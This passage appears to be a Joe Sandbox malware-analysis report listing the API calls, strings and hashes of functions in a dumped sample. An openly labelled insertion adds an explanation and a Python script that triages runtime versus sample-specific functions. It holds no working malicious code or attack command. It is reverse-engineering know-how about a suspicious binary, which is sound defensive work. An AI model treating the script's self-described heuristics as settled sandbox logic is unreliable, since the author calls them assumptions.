                                                                      • Opcode Fuzzy Hash: 45298b7ebd595602ade737cc2893e03b0449b869ca8ecaa37840e361c90589c4
                                                                      • Instruction Fuzzy Hash: 1781B6B0D04398DFEB22CFA9C94579EFBF4AF14304F2482ADD444AB291EB759A44CB51
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,755CD0F6,?,00000000,?,?,?,?,?,?,?,00000000,0042ABC5,000000FF), ref: 003EC264
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC29E
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EC302
                                                                      • __Getctype.LIBCPMT ref: 003EC34B
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EC391
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EC445
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3635123611-1405518554
                                                                      • Opcode ID: 7968538db73ff8bec0cb6ba9ebc07791bb7441bb1eaf16e1fa83881130296cc2
                                                                      • Instruction ID: 68c1a01ba0f84cac205fa46c8260056dbddd5d5ed868e0b3c527d0784b807948
                                                                      • Opcode Fuzzy Hash: 7968538db73ff8bec0cb6ba9ebc07791bb7441bb1eaf16e1fa83881130296cc2
                                                                      • Instruction Fuzzy Hash: 69616EB0D01298EEEB12CFE9C5447DEBBF4AF15304F1482A9E454AB3C1D7B99A09CB51
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004074C9
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00407557
                                                                      • __alloca_probe_16.LIBCMT ref: 00407581
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004075C9
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004075E3
                                                                      • __alloca_probe_16.LIBCMT ref: 00407609
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00407646
                                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00407663
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                      • String ID:
                                                                      • API String ID: 3603178046-0
                                                                      • Opcode ID: 9923feb5307d1df28ac4b6ea2d4b99e2feee8f5673c0a707003f2b710833db43
                                                                      • Instruction ID: 535b7c01805a903efcabd96bb8335c983547ec389335a0ea4893a104a83cd878
                                                                      • Opcode Fuzzy Hash: 9923feb5307d1df28ac4b6ea2d4b99e2feee8f5673c0a707003f2b710833db43
                                                                      • Instruction Fuzzy Hash: 0971C771D08616ABDF218F58CC45AEF7BB5AF49364F14043BE405B62D1DB3AE801CB6A
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,003EC6DF,?,00000001,00000000,?,00000000,?,003EC6DF,?), ref: 00406F6C
                                                                      • __alloca_probe_16.LIBCMT ref: 00406F98
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F,?), ref: 00406FD7
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F), ref: 00406FF4
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F), ref: 00407033
                                                                      • __alloca_probe_16.LIBCMT ref: 00407050
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F), ref: 00407092
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,003EC6DF,?,?,00000000,003ECCD3,0000003F,?), ref: 004070B5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                      • String ID:
                                                                      • API String ID: 2040435927-0
                                                                      • Opcode ID: c8fbcf4db159e48b433209c622e118790e8c7c35654905d4dbb85babb603de17
                                                                      • Instruction ID: cee535d5545fb007cc633f89e8e916bbb341e9a2db57e39dd6c618e1c6a6e5b7
                                                                      • Opcode Fuzzy Hash: c8fbcf4db159e48b433209c622e118790e8c7c35654905d4dbb85babb603de17
                                                                      • Instruction Fuzzy Hash: 9F51D372A0020AABDF209F50DC45FAB7BA9EF04754F11413AF905B62D0DB39AD11CB5A
                                                                      APIs
                                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,755CD0F6,?,00000004), ref: 003E59AA
                                                                      • LocalFree.KERNEL32(?), ref: 003E5ABB
                                                                      • MoveFileW.KERNEL32(?,00000000), ref: 003E5D5B
                                                                      • DeleteFileW.KERNEL32(?), ref: 003E5DA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                      • String ID: URL$url
                                                                      • API String ID: 1622375482-346267919
                                                                      • Opcode ID: 2aa68a737cd3df0b638f6e3255a1d4a4b9816e4de8403a83febc5d8ee45b0b71
                                                                      • Instruction ID: 57ad3e989a1852d8cb52e734bb7d2b1059ed2e00416fbead6c8873573047aab7
                                                                      • Opcode Fuzzy Hash: 2aa68a737cd3df0b638f6e3255a1d4a4b9816e4de8403a83febc5d8ee45b0b71
                                                                      • Instruction Fuzzy Hash: 1C027870E146A9DACB25DF29CD98B9DB7B5BF54304F2042D9D009A7291EB74ABC4CF80
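The entries in this listing mix MSVC runtime code with the sample's own logic. Functions whose calls go to LIBCPMT, LIBCMT or LIBVCRUNTIME and whose String ID is `bad locale name`, `csm` or `api-ms-$ext-ms-` are STL locale construction, the C++ exception frame handler and the CRT API-set loader respectively; the entry at 003E59AA (GetTempFileNameW with the `URL` prefix, then MoveFileW and DeleteFileW) is sample-specific file handling. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in exactly this text layout, converts each `ref:` address to an RVA using the dump's `Offset:` so the call sites can be located in the dropped PE at any load base, and applies triage rules that are the author's own assumptions (the runtime-string list, the "half the calls are library calls" rule and the temp-file pattern are heuristics, not Joe Sandbox logic). The sample text is a constructed excerpt of three entries taken from this page.

```python
"""Triage Joe Sandbox IDA-plugin function entries in the text layout used on
this page.  Added example, not part of the report or of Joe Sandbox; the
triage rules below are the author's assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: three entries excerpted from this report page.
SAMPLE = """\
APIs
• LocalAlloc.KERNEL32(00000040,00000018,755CD0F6,?,00000000), ref: 003EC264
• std::_Lockit::_Lockit.LIBCPMT ref: 003EC29E
• __Getctype.LIBCPMT ref: 003EC34B
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• Instruction ID: 68c1a01ba0f84cac205fa46c8260056dbddd5d5ed868e0b3c527d0784b807948
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,755CD0F6,?,00000004), ref: 003E59AA
• LocalFree.KERNEL32(?), ref: 003E5ABB
• MoveFileW.KERNEL32(?,00000000), ref: 003E5D5B
• DeleteFileW.KERNEL32(?), ref: 003E5DA3
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
Similarity
• String ID: URL$url
• Instruction ID: 57ad3e989a1852d8cb52e734bb7d2b1059ed2e00416fbead6c8873573047aab7
APIs
• _ValidateLocalCookies.LIBCMT ref: 00408D67
• ___except_validate_context_record.LIBVCRUNTIME ref: 00408D6F
Memory Dump Source
• Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
Similarity
• String ID: csm
• Instruction ID: 33073348539d85ee9ee7ad7dfb5bb215549edd7996daaea7737c53f4e773c470
"""

RUNTIME_MODULES = {"LIBCMT", "LIBCPMT", "LIBVCRUNTIME"}
# Strings emitted by MSVC runtime code rather than by the sample (assumed list).
RUNTIME_STRINGS = {"bad locale name", "csm", "ios_base::failbit set", "api-ms-$ext-ms-"}
FILE_CREATE = {"GetTempFileNameW", "GetTempFileNameA", "CreateFileW", "CreateFileA", "CopyFileW"}
FILE_MOVE_DELETE = {"MoveFileW", "MoveFileExW", "DeleteFileW", "DeleteFileA"}

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR".
# Indented "• Part of subcall function ..." lines deliberately do not match.
API_RE = re.compile(
    r"^•\s+(?P<name>\S+?)\.(?P<module>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>.*?)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int  # virtual address of the call site in the dumped image


@dataclass
class Entry:
    calls: list[ApiCall] = field(default_factory=list)
    image_base: int | None = None
    string_id: str = ""
    instruction_id: str = ""

    def rvas(self) -> list[int]:
        """Call sites relative to the dump's image base, so the same code can be
        found in the dropped PE even if it is loaded elsewhere."""
        assert self.image_base is not None, "entry has no Source File line"
        return [c.ref - self.image_base for c in self.calls]

    def is_runtime(self) -> bool:
        """Heuristic: MSVC CRT/STL helper rather than sample-specific code."""
        if self.string_id in RUNTIME_STRINGS:
            return True
        lib = sum(c.module in RUNTIME_MODULES for c in self.calls)
        return bool(self.calls) and lib * 2 >= len(self.calls)

    def stages_temp_file(self) -> bool:
        """Creates a file and then moves or deletes one in the same function."""
        names = {c.name for c in self.calls}
        return bool(names & FILE_CREATE) and bool(names & FILE_MOVE_DELETE)


def parse_entries(text: str) -> list[Entry]:
    """Split the report text into entries; a new entry starts at each 'APIs'."""
    entries: list[Entry] = []
    cur: Entry | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif line.startswith("• Source File:"):
            om = OFFSET_RE.search(line)
            if om:
                cur.image_base = int(om.group(1), 16)
        elif line.startswith("• String ID:"):
            cur.string_id = line[len("• String ID:"):].strip()
        elif line.startswith("• Instruction ID:"):
            cur.instruction_id = line[len("• Instruction ID:"):].strip()
    return entries


def triage(text: str) -> list[dict]:
    """One row per entry: verdict, API names and RVAs to pivot into a disassembler."""
    rows = []
    for e in parse_entries(text):
        if e.is_runtime():
            verdict = "runtime"
        elif e.stages_temp_file():
            verdict = "tempfile_staging"
        else:
            verdict = "review"
        rows.append({"instruction_id": e.instruction_id[:12], "verdict": verdict,
                     "apis": [c.name for c in e.calls],
                     "rvas": [hex(r) for r in e.rvas()]})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["verdict"], row["instruction_id"], row["apis"], row["rvas"])
```

Run against the sample, the two runtime entries are set aside and the temp-file function is reported with its call sites at RVAs 0x59AA, 0x5ABB, 0x5D5B and 0x5DA3, which is where to start in the dropped PE. Extend `RUNTIME_STRINGS` and the file-API sets as the report under review warrants; the 50% rule will misclassify a sample function that merely uses a few STL helpers, so treat "runtime" as a filter for first-pass reading, not a final verdict.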
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,0000000C,755CD0F6,?,00000000,00000000,?,?,?,?,00000000,0042B2D1,000000FF,?,003EEBCA,00000000), ref: 003EF624
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EF65A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EF6BE
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EF77E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EF832
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: c2f15131e0734358469337ab1c1544624d42c0e0cf9376927d22257d03faee8c
                                                                      • Instruction ID: 96cac2ec43c54a82ccd061855199484dd30e0f496e01de061d02bcba33d08579
                                                                      • Opcode Fuzzy Hash: c2f15131e0734358469337ab1c1544624d42c0e0cf9376927d22257d03faee8c
                                                                      • Instruction Fuzzy Hash: 927170B0D01298DEEF11CFA9C98479EBBB4AF15354F1442A9E414BB281D7B99A04C7A1
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,755CD0F6,?,00000000,00000000,?,?,?,00000000,0042B1DD,000000FF,?,003EED0A,00000000,?), ref: 003EF3F4
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EF42A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EF48E
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EF4FE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EF5B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: b041fdacbffd99fe994aad338b4863115b61fd66bdc6d1bc72a42866b98a68ca
                                                                      • Instruction ID: df03f38a6e963c9ac58ba19fa027bbd8e895b7bab526df5c9e985c8026fa4936
                                                                      • Opcode Fuzzy Hash: b041fdacbffd99fe994aad338b4863115b61fd66bdc6d1bc72a42866b98a68ca
                                                                      • Instruction Fuzzy Hash: 2A618FB0D01398EEEB11CFE9D94479EBBB4AF25304F1442ADE454AB2C1D7B99A04CB61
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00408D67
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00408D6F
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00408DF8
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00408E23
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00408E78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 0f220d9709b388b34d06e97222732ee10bf9d9086453f8f5a89107f2e669985b
                                                                      • Instruction ID: 33073348539d85ee9ee7ad7dfb5bb215549edd7996daaea7737c53f4e773c470
                                                                      • Opcode Fuzzy Hash: 0f220d9709b388b34d06e97222732ee10bf9d9086453f8f5a89107f2e669985b
                                                                      • Instruction Fuzzy Hash: 8C41A434A002199BCF10DF69C844A9FBBB6EF44314F14856AE954AB3D3DB399A01CBD9
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,0041CA78,?,?,?,00000000,?,?,0041CCA2,00000021,FlsSetValue,00431E00,00431E08,?), ref: 0041CA2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3664257935-537541572
                                                                      • Opcode ID: e194776b3fb196894752ef3fc5b8e990afe362e177e9942e28dc563026e629af
                                                                      • Instruction ID: 7f3c78a490ce6ca87a57760621c14f825eb8c9bd81b726ff71fc4ab30b3dfb53
                                                                      • Opcode Fuzzy Hash: e194776b3fb196894752ef3fc5b8e990afe362e177e9942e28dc563026e629af
                                                                      • Instruction Fuzzy Hash: C9212E71A81215A7CB22DB65AC84BEB37689F417E4F240132E805E7390E738ED41C6DC
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F282A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F2834
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • numpunct.LIBCPMT ref: 003F286E
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F2885
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F28A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID: tHD
                                                                      • API String ID: 743221004-3853015322
                                                                      • Opcode ID: 5bc2fe6dccbd38b68053b1ebe9fb28c8122c232bc03d74de087a1ae7714e2a9a
                                                                      • Instruction ID: 118883105096b28c7ff924d567907444d4cc14f92f81dd6d6f7c3a0e181063b2
                                                                      • Opcode Fuzzy Hash: 5bc2fe6dccbd38b68053b1ebe9fb28c8122c232bc03d74de087a1ae7714e2a9a
                                                                      • Instruction Fuzzy Hash: FE110E3590061DDBCF06EB60C8526BE77A1AF90710F29011DE610AB3C2DF349E018B80
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F8037
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F8041
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • numpunct.LIBCPMT ref: 003F807B
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F8092
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F80B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                      • String ID: ID
                                                                      • API String ID: 743221004-3023824217
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F266B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F2675
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • codecvt.LIBCPMT ref: 003F26AF
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F26C6
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F26E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                      • String ID: xHD
                                                                      • API String ID: 712880209-3971129470
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F76E7
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F76F1
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • collate.LIBCPMT ref: 003F772B
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7742
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7762
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID: ID
                                                                      • API String ID: 1007100420-3023824217
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 004038C8
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004038D2
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • collate.LIBCPMT ref: 0040390C
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403923
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403943
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                      • String ID: dJD
                                                                      • API String ID: 1007100420-3417872616
                                                                      APIs
